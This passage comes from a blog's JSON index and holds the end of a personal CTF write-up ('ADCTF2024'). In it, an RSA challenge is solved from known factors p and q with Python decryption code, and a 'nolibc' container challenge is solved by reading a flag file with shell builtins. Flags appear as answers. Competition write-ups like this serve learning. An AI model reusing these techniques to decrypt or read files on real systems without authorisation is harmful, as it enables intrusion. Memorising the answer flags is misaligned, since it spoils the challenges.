6371306651441414494898158050750379466411385075727176973777141489866804949152371066737700949957382328723739039588265348722939538409644758452741820636286764732056622302045805546424342834578149204912690500590371488794741154219116429974884626176276687505603436615961383352315424341433102202637442619829308641010524729990244179166911981814627661923080609365126766407039132426191716113002194884261389976932121106269022968620075855360220818974890016650718871530138072213210849868914955977855950213371455369372213479451425395072947888041803100826574552594123357214975040806204084524320510358181592274275785398054808107630303 p = 102786970188634214370227829796268661753428191750544697648009912021832510479846406842660652442082773578020088104585096298944409097150001317920480815093132150004913448767202198299893840769568841219755466694275862843676241177608436424364735585247574303039353776987581503833128444693347920806395102183872665901277 q = 151606784799548610095916644217950865940397761353988655007201180031392776522565708552689972206548545357755036833336762542306291348158476176958083317845208464472445906639525228156065966245815886462442808969891370598247564766047649027653895495777728985622422940233924415769188183003695053034562331004932104400857 e = 65537 phi_n = (p-1)*(q-1) d = inverse(e,phi_n) m = pow(c, d, n) print(long_to_bytes(m)) flag{factor_db_is_useful}\nMisc # nolibc # 8bce3ee03ac4:/# echo * 4La9-7158808f bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var 8bce3ee03ac4:/# while read line; do echo \u0026#34;$line\u0026#34;; done \u0026lt; 4La9-7158808f flag{94298258-501b-4e56-be80-5f19af81c913} flag{94298258-501b-4e56-be80-5f19af81c913}\n","date":"2 December 2024","externalUrl":null,"permalink":"/en/posts/adctf2024/","section":"Posts","summary":"Personal WriteUP of AD Studio 2024 Recruitment Competition","title":"ADCTF2024","type":"posts"},{"content":"","externalUrl":null,"permalink":"/en/tags/ad-member/","section":"Tags","summary":"","title":"AD Member","type":"tags"},{"content":"","externalUrl":null,"permalink":"/tags/ad%E6%88%90%E5%91%98/","section":"Tags","summary":"","title":"AD成员","type":"tags"},{"content":"","externalUrl":null,"permalink":"/en/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/en/series/","section":"Series","summary":"","title":"Series","type":"series"}]